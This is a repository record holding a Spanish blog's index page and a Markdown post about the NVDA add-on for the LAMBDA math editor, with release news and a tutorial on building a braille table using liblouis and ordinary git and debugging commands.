lambda-nvda-esp/lambda-nvda-esp.github.io | https://github.com/lambda-nvda-esp/lambda-nvda-esp.github.io | 036f84e33c72d495ff4078cb7cbb1b12f9f6bdd9 | eff0995772294031e0ead0e6efb94828d04f35f2 | 791d0a3065414d2ea2d8944b2b4705183b158cef | refs/heads/master | 2021-01-21T21:09:31.463146 | 2017-10-23T15:53:42 | 2017-10-23T15:53:42 | 92,311,152 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7058847546577454,
"alphanum_fraction": 0.7248494029045105,
"avg_line_length": 93.87258911132812,
"blob_id": "d6042fbe59766ddefd9ecfa6760173d8bbdbb7a2",
"content_id": "369603cd077f3549e39eae347b0a99f162d093cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 24819,
"license_type": "no_license",
"max_line_length": 926,
"num_lines": 259,
"path": "/index.html",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html prefix=\"og: http://ogp.me/ns# article: http://ogp.me/ns/article# \" lang=\"es\">\n<head>\n<meta charset=\"utf-8\">\n<meta name=\"description\" content=\"sitio sobre la organización lambda-nvda-esp y el uso de LAMBDA con NVDA en español\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n<title>LAMBDA con NVDA en español</title>\n<link href=\"assets/css/all-nocdn.css\" rel=\"stylesheet\" type=\"text/css\">\n<meta name=\"theme-color\" content=\"#5670d4\">\n<meta name=\"generator\" content=\"Nikola (getnikola.com)\">\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"RSS\" href=\"rss.xml\">\n<link rel=\"canonical\" href=\"https://lambda-nvda-esp.github.io/\">\n<!--[if lt IE 9]><script src=\"assets/js/html5.js\"></script><![endif]--><link rel=\"prefetch\" href=\"a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/\" type=\"text/html\">\n</head>\n<body>\n<a href=\"#content\" class=\"sr-only sr-only-focusable\">Ir al contenido principal</a>\n\n<!-- Menubar -->\n\n<nav class=\"navbar navbar-inverse navbar-static-top\"><div class=\"container\">\n<!-- This keeps the margins nice -->\n <div class=\"navbar-header\">\n <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-navbar\" aria-controls=\"bs-navbar\" aria-expanded=\"false\">\n <span class=\"sr-only\">Mostrar navegación</span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n </button>\n <a class=\"navbar-brand\" href=\"https://lambda-nvda-esp.github.io/\">\n\n <span id=\"blog-title\">LAMBDA con NVDA en español</span>\n </a>\n </div>\n<!-- /.navbar-header -->\n <div class=\"collapse navbar-collapse\" id=\"bs-navbar\" aria-expanded=\"false\">\n <ul class=\"nav navbar-nav\">\n<li>\n<a href=\"p/distribuidores\">Distribuidores LAMBDA en España</a>\n </li>\n<li>\n<a href=\"p/about\">Sobre Nosotros</a>\n </li>\n<li>\n<a href=\"archive.html\">Archivo</a>\n </li>\n<li>\n<a href=\"rss.xml\">Canal RSS</a>\n\n \n </li>\n</ul>\n<ul class=\"nav navbar-nav navbar-right\"></ul>\n</div>\n<!-- /.navbar-collapse -->\n </div>\n<!-- /.container -->\n</nav><!-- End of Menubar --><div class=\"container\" id=\"content\" role=\"main\">\n <div class=\"body-content\">\n <!--Body content-->\n <div class=\"row\">\n \n \n\n \n<div class=\"postindex\">\n <article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/\" class=\"u-url\">Actualizaciones de agosto a octubre de 2017: versión 1.2.1 y transición a NVDA.es</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-10-23T17:47:32+02:00\" title=\"2017-10-23 17:47\">2017-10-23 17:47</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <p>Desde agosto se han realizado varios cambios reseñables en el complemento. Por ejemplo, la publicación de la versión 1.2.1 del complemento que ya se puede descargar desde la web oficial e incluye mejoras relativas al braille.\nPero la novedad más importante que hay que anunciar llega este lunes 23 de octubre. 
Debido a que se ha creado y presentado una nueva y completa web para la comunidad hispanohablante de NVDA, se ha decidido que los contenidos de esta web se integren en la nueva, de forma que los usuarios puedan conocer todas las novedades sobre NVDA y su entorno en un solo lugar. Así pues, se anuncia que desde ahora y progresivamente se comenzará a cambiar cierta información de interés general. Al final del proceso la vocación de informar sobre LAMBDA con NVDA en español con la que nació esta web será transferida a NVDA.es. Seguiremos informando y para finalizar aclaramos que no cambiarán las personas que están detrás de este proyecto. Gracias por el apoyo, y sobre todo, por el uso de nuestro trabajo.</p>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/ya-esta-aqui-la-version-120-del-complemento-para-lambda/\" class=\"u-url\">Ya está aquí la versión 1.2.0 del complemento para LAMBDA\"</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/ya-esta-aqui-la-version-120-del-complemento-para-lambda/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-08-10T10:23:20+02:00\" title=\"2017-08-10 10:23\">2017-08-10 10:23</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>La versión 1.2.0 ya se puede descargar desde el sitio oficial de complementos. Esta versión añade las traducciones para búlgaro, francés, rumano y serbio, además de actualizar las traducciones española y gallega. Asimismo la traducción italiana se ha transferido al responsable del idioma en el equipo de traducción, de forma que se podrían detectar cambios.</p>\n<p>disfrutad esta versión.</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/liberada-la-version-118-del-complemento-para-lambda-primera-version-estable/\" class=\"u-url\">Liberada la versión 1.1.8 del complemento para LAMBDA, primera versión estable</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/liberada-la-version-118-del-complemento-para-lambda-primera-version-estable/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-06-19T12:25:53+02:00\" title=\"2017-06-19 12:25\">2017-06-19 12:25</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>Hoy día 19 de junio, como estaba previsto, ha sido liberada al público la versión 1.1.8 del complemento para LAMBDA, descargable desde <a href=\"https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon\">https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon</a>.\nEn cuanto llegue el complemento al repositorio de traductores en Assembla se actualizarán las traducciones. 
La traducción de los mensajes está actualizada, pero la de la documentación es la que necesita ser comparada y traducida para estar en consonancia con la original en inglés.\nDesde aquí continuaremos trabajando dando soporte a la tabla braille española y a las traducciones española y gallega.</p>\n<p>Con esta versión, al fin, se culmina un trabajo de varias personas desde septiembre que ha conseguido igualar el soporte para LAMBDA de NVDA al de Jaws.</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente/\" class=\"u-url\">Actualizadas traducciones: añadida traducción para el mensaje de alerta de perfil lambda existente</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-27T13:23:02+02:00\" title=\"2017-05-27 13:23\">2017-05-27 13:23</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>En el día de hoy se ha enviado la pull request al repo oficial para incluír en la versión inestable (rama master) las últimas traducciones (español y gallego). En ambos idiomas se ha traducido el diálogo que avisa de que un perfil llamado lambda ya existe (en su nueva versión). se recuerda a los usuarios que la versión dev en el sitio de complementos no incluye traducciones. Para descargar una con ellas está disponible un enlace en [la web de la <a href=\"https://nvdaes.github.io\">comunidad hispanohablante</a>. También puedes compilar uno si cuentas con las herramientas necesarias, descritas en la documentación de desarrollo de complementos de NVDA.\nEsta será probablemente la última traducción que se envíe por este método, ya que cuando se declare una versión estable las traducciones pasarán a administrarse a través del repositorio de la comunidad de traductores.</p>\n<p>Seguiremos informando.</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/proceso-de-construccion-de-una-tabla-braille-para-el-complemento/\" class=\"u-url\">Proceso de construcción de una tabla braille para el complemento</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/proceso-de-construccion-de-una-tabla-braille-para-el-complemento/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-25T09:12:09+02:00\" title=\"2017-05-25 09:12\">2017-05-25 09:12</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>Nota: Este post ha sido construido a partir de la información proporcionada por Alberto Zanella y nuestra experiencia propia construyendo esta tabla.</p>\n<p>Tenía en mente hacer algo como este post dese hace unos días, en inglés o español. Dado que la intención de este complemento es que se expanda a los más idiomas posibles, hago este manual para que cada uno pueda hacer la tabla en el suyo a partir del .jbt de los scripts de Jaws. 
Como el sitio es en español, no quedará más remedio que hacerla en ese idioma, google Translate is your friend.</p>\n<ol>\n<li>\n<p>Localizamos la tabla LambdaX.jbt en Inicio>Jaws X.Y>Explorar archivos de Jaws>Explorar archivos de programa o en C:\\Archivos de programa\\Freedom Scientific\\Jaws\\X.Y, donde X es la versión mayor (16, 17, 18, etc.) e Y la menor (normalmente 0, pero puede variar, sobre todo para versiones anteriores a Jaws8). En esa tabla encontraremos una lista de signos como la que sigue:</p>\n<p>\\1 = 123</p>\n<p>\\2 = 456</p>\n<p>\\3 = 567</p>\n</li>\n<li>\n<p>Tenemos que convertir los números a la izquierda de la tabla a hexadecimal, que es lo que usa Liblouis, que es el motor braille de NVDA. Para ello podemos usar el `<a href=\"linked_files/dec_to_hex.py\">script dec2hex por José Manuel Delicado</a>. Podemos ejecutar en Python:</p>\n<pre class=\"code literal-block\"><span></span><span class=\"kn\">import</span> <span class=\"nn\">dec_to_hex</span>\n<span class=\"n\">dec_to_hex</span><span class=\"o\">.</span><span class=\"n\">procesar</span><span class=\"p\">(</span><span class=\"s2\">\"LambdaX.jbt\"</span><span class=\"p\">)</span>\n</pre>\n\n\n<p>Esto devolverá un txt en el mismo sitio donde se ejecutó el código llamado LambdaX.txt con el mismo formato pero con números hexadecimales en lugar de decimales a la izqueirda. En ambas, lo que figura a la derecha son los patrones de puntos. En las tablas de Liblouis encontraremos un formato algo diferente: categoría símbolo/representación-hexadecimal(\\X0000, por ejemplo \\X001a, después de la X van cuatro caracteres, si no se llega a ese número rellenar con ceros a la izquierda, por ejemplo para el carácter anterior 1a se ponen dos ceros de forma que \\X001a) patrón-puntos.</p>\n</li>\n<li>\n<p>Una vez se han convertido, queda el trabajo más arduo. Comparar los valores de puntos de la tabla de NVDA con los de Jaws. Para eso necesitamos descargar las tablas de Liblouis. Con Git (si no tienes Git, recomendable descargarlo), ejecutar desde la consola:</p>\n<pre class=\"code literal-block\"><span></span>git clone https://github.com/liblouis/liblouis\n</pre>\n\n\n<p>Obtendremos una carpeta llamada Liblouis. Dentro de ella iremos a tables y buscaremos la nuestra, normalmente algo así como X_G0.utb (las G1 son de 6 puntos y no nos interesan) o X-8.utb/X-8dots.utb. Para incluirla en el addon y testearla, necesitamos bajarlo, también usando Git, ejecutando:</p>\n<pre class=\"code literal-block\"><span></span>git clone https://github.com/nvdaaddons/lambda\n</pre>\n\n\n<p>Tendremos una carpeta \"lambda\". Tendremos que entrar y navegad a ddon>appModules>LAMBDA>brailleTables. Pegamos la tabla que copiamos desde la carpeta tables de Liblouis y la renombramos al estilo de los archivos que ya están en esa carpeta (lambda-X.utb).</p>\n</li>\n<li>\n<p>Primero deberíamos comprobar los include de la tabla, haciendo una búsqueda con la función buscar del editor con que la abramos (se recomienda Notepad++). Si el include hace referencia a un archivo que no está en la carpeta brailleTables que tendremos abierta en otra ventana debemos buscar ese archivo en Liblouis (por lo general en la carpeta tables) y pegarlo, sin cambiar el nombre, para que la tabla pueda utilizar las dependencias que necesite. 
En el caso de nuestra tabla, la española, no fue necesario ya que todas las dependencias de la española las requería también la italiana que ya estaba hecha.</p>\n</li>\n<li>\n<p>Después, se empiezan a verificar todos los símbolos (obviando ciertas categorías, como letras o números, aunque si las cotejamos no debería llevarnos más de 3 horas toda la tabla). Recomiendo ir marcando en el txt que generó el script en el paso 2 (con * o lo que nos sea más cómodo) los símbolos que ya hayamos verificado, luego nos será útil a la hora de añadir aquellos símbolos que falten. Debemos modificar los puntos de aquellos símbolos que estén mal primero, y posteriormente añadir todos los que no figuran en la tabla. En este punto yo personalmente al hacer la tabla no fui demasiado meticuloso, asigné a todos la categoría math y no puse descripción porque los que hicieron la tabla de Jaws se ve que tampoco tenían demasiado tiempo como para ponerse a mirar qué era cada símbolo y ponerlo como comentario. Para añadir símbolos, por ejemplo, si en el txt tenemos b1 345678 podemos poner: math \\X00b1 345678.</p>\n</li>\n<li>\n<p>Si has hecho todo esto con éxito, felicidades, lo esencial está completado. Necesitas probar la tabla con NVDA o con lou_debug, lo que esté a tu alcance. Desconozco si hay versión de Liblouis para instalar en windows, pero para Linux la hay y me fue muy útil a la hora de depurar errores en la tabla. Si tenéis por ahí un servidor o máquina virtual solo es cosa de bajarse Liblouis o el código (si es el código compilarlo con make && make install) y pasaros a la MV o servidor el utb. Después de eso:</p>\n<pre class=\"code literal-block\"><span></span>lou_debug LambdaX.utb\n</pre>\n\n\n<p>Entonces debería decir qué errores ha encontrado y la línea. Para ir a una línea X en el Notepad++ podemos usar Ir a la línea... en el menú buscar (ctrl+G). Si no tienes lou_debug o alguna herramienta de depuración de Liblouis a tu alcance, te tocará hacerlo de la forma chapuza, a mano. A mí me dio demasiada pereza ponerme a verificar qué había hecho mal (además de que seguramente algunos errores no sería capaz de encontrarlos) y busqué, en su lugar, lo de la depuración en Liblouis que cuento al principio de este paso. <!-- ToDo: Mirar si hay debugging para windows y especificarlo.--></p>\n</li>\n<li>\n<p>Si has depurado todos los errores, enhorabuena, tu tabla debería funcionar con el complemento. compila el complemento si tienes las herramientas necesarias (solo tecla scons en una ventana del símb del sistema u otra consola debidamente configurada), o añade el utb en %appdata%\\nvda\\addons\\lambda\\appModules\\LAMBDA\\brailleTables. Reinicia NVDA.</p>\n</li>\n<li>\n<p>Una vez que no haya ningún error ponte en contacto con el autor o envía una pull request al repo nvdaaddons/lambda de GitHub con la tabla para que la incluya (cómo enviar pull requests en GitHub está fuera del propósito de este documento). Si la acepta, no olvides ponerte en contacto con el traductor del idioma (o de los idiomas) a los que corresponde tu tabla para avisarle de que la haga predeterminada para todos los que instalen el complemento en ese/esos idioma/s. Si no sabes el traductor de tu idioma busca y subscríbete a la lista de traducciones de NVDA; allí podrás preguntar. Tambien puedes hacer de detective y mirar quién hace commits en tu/s idioma/s en el repo screenReaderTranslations de assembla.com.</p>\n</li>\n</ol>\n<p>Y esto es todo, no tiene mucho más. Gracias por tragaros el tocho. 
Ah, y suerte.\n<strong><em>La tabla españoala fue construída ena colaboración entre José Manuel Delicado, Salva Doménech y yo, con el autor. Agradecimiento especial a José Enrique Fernández del Campo por sus detallados reportes de errores que intentamos corregir antes de la publicación de la tabla.</em></strong></p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/podcast-y-resena-sobre-lambda-con-nvda-en-el-sitio-web-de-la-comunidad-hispanohablante/\" class=\"u-url\">Podcast y reseña sobre LAMBDA con NVDA en el sitio web de la comunidad hispanohablante</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil-a-partir-de-lo-publicado-por-salva-domenech-miguel-con-la-colaboracion-de-noelia-rm/\">Iván Novegil (a partir de lo publicado por Salva Doménech Miguel con la colaboración de Noelia R.M.)</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/podcast-y-resena-sobre-lambda-con-nvda-en-el-sitio-web-de-la-comunidad-hispanohablante/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-24T18:17:04+02:00\" title=\"2017-05-24 18:17\">2017-05-24 18:17</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>Es cierto que desde hace bastante tiempo, unos 4 años calculando a ojo, NVDA soportaba, mediante un plugin chapuza, la lectura del editor Lambda. También es cierto que ONCE intentó, mediante este plugin,, que debía ejecutarse en un portable y recomendaban ejecutar en una máquina virtual de Windows XP en VirtualBox (que yo llegué a tener cuando Windows 8 empezó a expandirse), potenciarlo; pero no es menos cierto que como ya comenté, el plugin (creo que de autor desconocido) era chapucero. Era inestable, el soporte no era completo y además debía utilizarse una versión portable de NVDA con ese plugin instalado a mano y a ser posible nada más a riesgo de que interfiriera con otros complementos. No sé si algún asiduo usuario de Lambda pudo probar esto, la verdad es que yo no llegué a usarlo, ni en dos ocasiones, pero casi juraría que no ofrecía soporte braille en ningún idioma</p>\n<p>Bien, supongo que encontrándose en la situación que comenté arriba, y sin ganas de comprar un JAWS o llamémosle x a la razón por la que lo hizo, en septiembre el autor de este complemento, Alberto Zanella, decidió solicitar una revisión. No recuerdo ahora si la pasó o no, creo que se le comentaron un par de cosas a mejorar, pero desapareció de la faz de la tierra.</p>\n<p>Algunos, como Iván Novegil, José Enrique Fernández del Campo, o sin ir más lejos yo mismo; manifestamos la utilidad que veíamos a esto. Durante mucho tiempo la versión compartida por Alberto era la que había, con traducciones a castellano creo recordar gracias a la ayuda de miembros de la comunidad y con tablas braille en italiano. No se volvió a saber casi de él y no se llegó a saber tampoco bien del todo como solucionar el tema de las tablas braille.</p>\n<p>A principios de mayo, el autor volvió a aparecer, respondiendo a algunas isues de Github de Iván. La cosa volvió a ponerse en marcha con la aparición también de José manuel Delicado, de manera que la historia termina con un trabajo brutal en algo así como 3 semanas. 
Un trabajo brutal en el que se han mejorado incidencias como la mejora de algunas pronunciaciones, la dición de nuevos elementos a pronunciar (las coordenadas de las celdillas de una matriz, por ejemplo), y la mejora más evidente: el soporte braille completo con una tabla en castellano. Y en este sentido sí creo que es muy importante agradecer infinitamente a Iván Novegil, a José Manuel Delicado, a José Enrique Fernández del Campo y obviamente al autor, por este trabajo tan excelente y en tiempo récord para obtener un complemento casi publicado al 100% y con muy pocos fallos que solucionar.</p>\n<p>Creo que toda la comunidad y en general todos los usuarios y usuarias del lector y sobre todo del editor matemático lambda solo podemos estar agradecidos, muy, agradecidos, por este maravilloso trabajo. Quedan algunos fallos por pulir (como la desubicación del braille al navegar por una línea con sensores o algunos signos que no semuestran) pero algunos de estos son del propio Lambda y las nuevas versiones de Windows.</p>\n<p>En definitiva, creo que podemos estar contentos si decimos que el soporte es similar al que ofrece JAWS con sus correspondientes scripts como así podéis comprobar en el podcast enlazado en esta entrada.</p>\n<p>Es muy probable que en el futuro inmediato, las próximas versiones del addon ya no presenten algunos errores de los que doy cuenta en él.</p>\n<h4>Podcast sobre Lambda</h4>\n<p><audio controls>\n <source src=\"https://s.juventudelatina.com/juvenube/index.php/s/KtyR7zeybfI7uRL/download\" type=\"audio/mpeg\">\nTu navegador no admite la reproducción de este podcast.\n</source></audio></p>\n<p><a href=\"https://s.juventudelatina.com/juvenube/index.php/s/KtyR7zeybfI7uRL/download\">Descargar podcast</a></p>\n<h4>Referencias</h4>\n<h5>Contenido matemático del podcast</h5>\n<ul>\n<li><a href=\"https://nvdaes.github.io/linkedFiles/salvaPrueba.lambda\">Descargar fichero Lambda</a></li>\n<li><a href=\"https://nvdaes.github.io/linkedFiles/salvaPrueba.html\">Ver en formato HTML</a></li>\n</ul>\n<p>Nota: Para explorar el fichero anterior con Firefox o Internet Explorer, puedes instalar <a href=\"http://www.dessci.com/en/products/mathplayer/\">MathPlayer</a></p>\n<p>Para más información, consulta la sección \"Leyendo Contenido Matemático\" en la guía de NVDA.</p>\n<h5>Lambda y su complemento</h5>\n<ul>\n<li><a href=\"https://addons.nvda-project.org/addons/lambda.es.html\">Página del complemento de NVDA</a></li>\n<li><a href=\"http://www.lambdaproject.org/home\">Proyecto Lambda</a></li>\n<li>\n<a href=\"ftp://ftp.once.es/pub/utt/tiflosoftware/Miscelanea/LambdaSetup140.zip\">Descargar Lambda</a> (archivo del CIDAT)</li>\n</ul>\n<p>copiado del original en [https://nvdaes.github.io/Lambda-con-NVDA/]</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/bienvenidos-a-la-web-de-lambda-nvda-esp/\" class=\"u-url\">bienvenidos a la web de LAMBDA-NVDA-esp</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/bienvenidos-a-la-web-de-lambda-nvda-esp/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-24T17:43:03+02:00\" title=\"2017-05-24 17:43\">2017-05-24 17:43</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <p>Pues eso, bienvenidos. 
Podéis obtener más información sobre nosotros <a href=\"p/about\">aquí</a></p>\n </div>\n </article>\n</div>\n\n\n\n\n\n\n\n </div>\n <!--End of body content-->\n\n <footer id=\"footer\">\n Contents © 2017 <a href=\"mailto:[email protected]\">Organización de GitHub lambda-nvda-esp</a> - Powered by <a href=\"https://getnikola.com\" rel=\"nofollow\">Nikola</a> \n \n </footer>\n</div>\n</div>\n\n\n <script src=\"assets/js/all-nocdn.js\"></script><script src=\"assets/js/colorbox-i18n/jquery.colorbox-es.js\"></script><script>$('a.image-reference:not(.islink) img:not(.islink)').parent().colorbox({rel:\"gal\",maxWidth:\"100%\",maxHeight:\"100%\",scalePhotos:true});</script><!-- fancy dates --><script>\n moment.locale(\"es\");\n fancydates(0, \"YYYY-MM-DD HH:mm\");\n </script><!-- end fancy dates -->\n</body>\n</html>\n"
},
{
"alpha_fraction": 0.7725606560707092,
"alphanum_fraction": 0.78398197889328,
"avg_line_length": 121.29310607910156,
"blob_id": "6bb36472a85a47acce5bbcfff9e3a8f138129f9c",
"content_id": "507db88f91792e8a47987c732b470205ca2a694f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7196,
"license_type": "no_license",
"max_line_length": 922,
"num_lines": 58,
"path": "/a/proceso-de-construccion-de-una-tabla-braille-para-el-complemento/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Proceso de construcción de una tabla braille para el complemento\n.. slug: proceso-de-construccion-de-una-tabla-braille-para-el-complemento\n.. date: 2017-05-25 09:12:09 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nNota: Este post ha sido construido a partir de la información proporcionada por Alberto Zanella y nuestra experiencia propia construyendo esta tabla.\n\nTenía en mente hacer algo como este post dese hace unos días, en inglés o español. Dado que la intención de este complemento es que se expanda a los más idiomas posibles, hago este manual para que cada uno pueda hacer la tabla en el suyo a partir del .jbt de los scripts de Jaws. Como el sitio es en español, no quedará más remedio que hacerla en ese idioma, google Translate is your friend.\n\n1. Localizamos la tabla LambdaX.jbt en Inicio>Jaws X.Y>Explorar archivos de Jaws>Explorar archivos de programa o en C:\\Archivos de programa\\Freedom Scientific\\Jaws\\X.Y, donde X es la versión mayor (16, 17, 18, etc.) e Y la menor (normalmente 0, pero puede variar, sobre todo para versiones anteriores a Jaws8). En esa tabla encontraremos una lista de signos como la que sigue:\n\n\t\\1 = 123\n\n\t\\2 = 456\n\n\t\\3 = 567\n\n2. Tenemos que convertir los números a la izquierda de la tabla a hexadecimal, que es lo que usa Liblouis, que es el motor braille de NVDA. Para ello podemos usar el `[script dec2hex por José Manuel Delicado](/linked_files/dec_to_hex.py). Podemos ejecutar en Python:\n\n\t\timport dec_to_hex\n\t\tdec_to_hex.procesar(\"LambdaX.jbt\")\n\n\tEsto devolverá un txt en el mismo sitio donde se ejecutó el código llamado LambdaX.txt con el mismo formato pero con números hexadecimales en lugar de decimales a la izqueirda. En ambas, lo que figura a la derecha son los patrones de puntos. En las tablas de Liblouis encontraremos un formato algo diferente: categoría símbolo/representación-hexadecimal(\\X0000, por ejemplo \\X001a, después de la X van cuatro caracteres, si no se llega a ese número rellenar con ceros a la izquierda, por ejemplo para el carácter anterior 1a se ponen dos ceros de forma que \\X001a) patrón-puntos.\n\n3. Una vez se han convertido, queda el trabajo más arduo. Comparar los valores de puntos de la tabla de NVDA con los de Jaws. Para eso necesitamos descargar las tablas de Liblouis. Con Git (si no tienes Git, recomendable descargarlo), ejecutar desde la consola:\n\n\t\tgit clone https://github.com/liblouis/liblouis\n\n\tObtendremos una carpeta llamada Liblouis. Dentro de ella iremos a tables y buscaremos la nuestra, normalmente algo así como X_G0.utb (las G1 son de 6 puntos y no nos interesan) o X-8.utb/X-8dots.utb. Para incluirla en el addon y testearla, necesitamos bajarlo, también usando Git, ejecutando:\n\n\t\tgit clone https://github.com/nvdaaddons/lambda\n\n\tTendremos una carpeta \"lambda\". Tendremos que entrar y navegad a ddon>appModules>LAMBDA>brailleTables. Pegamos la tabla que copiamos desde la carpeta tables de Liblouis y la renombramos al estilo de los archivos que ya están en esa carpeta (lambda-X.utb).\n\n4. Primero deberíamos comprobar los include de la tabla, haciendo una búsqueda con la función buscar del editor con que la abramos (se recomienda Notepad++). 
Si el include hace referencia a un archivo que no está en la carpeta brailleTables que tendremos abierta en otra ventana debemos buscar ese archivo en Liblouis (por lo general en la carpeta tables) y pegarlo, sin cambiar el nombre, para que la tabla pueda utilizar las dependencias que necesite. En el caso de nuestra tabla, la española, no fue necesario ya que todas las dependencias de la española las requería también la italiana que ya estaba hecha.\n\n5. Después, se empiezan a verificar todos los símbolos (obviando ciertas categorías, como letras o números, aunque si las cotejamos no debería llevarnos más de 3 horas toda la tabla). Recomiendo ir marcando en el txt que generó el script en el paso 2 (con * o lo que nos sea más cómodo) los símbolos que ya hayamos verificado, luego nos será útil a la hora de añadir aquellos símbolos que falten. Debemos modificar los puntos de aquellos símbolos que estén mal primero, y posteriormente añadir todos los que no figuran en la tabla. En este punto yo personalmente al hacer la tabla no fui demasiado meticuloso, asigné a todos la categoría math y no puse descripción porque los que hicieron la tabla de Jaws se ve que tampoco tenían demasiado tiempo como para ponerse a mirar qué era cada símbolo y ponerlo como comentario. Para añadir símbolos, por ejemplo, si en el txt tenemos b1 345678 podemos poner: math \\X00b1 345678.\n\n6. Si has hecho todo esto con éxito, felicidades, lo esencial está completado. Necesitas probar la tabla con NVDA o con lou_debug, lo que esté a tu alcance. Desconozco si hay versión de Liblouis para instalar en windows, pero para Linux la hay y me fue muy útil a la hora de depurar errores en la tabla. Si tenéis por ahí un servidor o máquina virtual solo es cosa de bajarse Liblouis o el código (si es el código compilarlo con make && make install) y pasaros a la MV o servidor el utb. Después de eso:\n\n\t\tlou_debug LambdaX.utb\n\n\tEntonces debería decir qué errores ha encontrado y la línea. Para ir a una línea X en el Notepad++ podemos usar Ir a la línea... en el menú buscar (ctrl+G). Si no tienes lou_debug o alguna herramienta de depuración de Liblouis a tu alcance, te tocará hacerlo de la forma chapuza, a mano. A mí me dio demasiada pereza ponerme a verificar qué había hecho mal (además de que seguramente algunos errores no sería capaz de encontrarlos) y busqué, en su lugar, lo de la depuración en Liblouis que cuento al principio de este paso. <!-- ToDo: Mirar si hay debugging para windows y especificarlo.-->\n\n7. Si has depurado todos los errores, enhorabuena, tu tabla debería funcionar con el complemento. compila el complemento si tienes las herramientas necesarias (solo tecla scons en una ventana del símb del sistema u otra consola debidamente configurada), o añade el utb en %appdata%\\nvda\\addons\\lambda\\appModules\\LAMBDA\\brailleTables. Reinicia NVDA.\n\n8. Una vez que no haya ningún error ponte en contacto con el autor o envía una pull request al repo nvdaaddons/lambda de GitHub con la tabla para que la incluya (cómo enviar pull requests en GitHub está fuera del propósito de este documento). Si la acepta, no olvides ponerte en contacto con el traductor del idioma (o de los idiomas) a los que corresponde tu tabla para avisarle de que la haga predeterminada para todos los que instalen el complemento en ese/esos idioma/s. Si no sabes el traductor de tu idioma busca y subscríbete a la lista de traducciones de NVDA; allí podrás preguntar. 
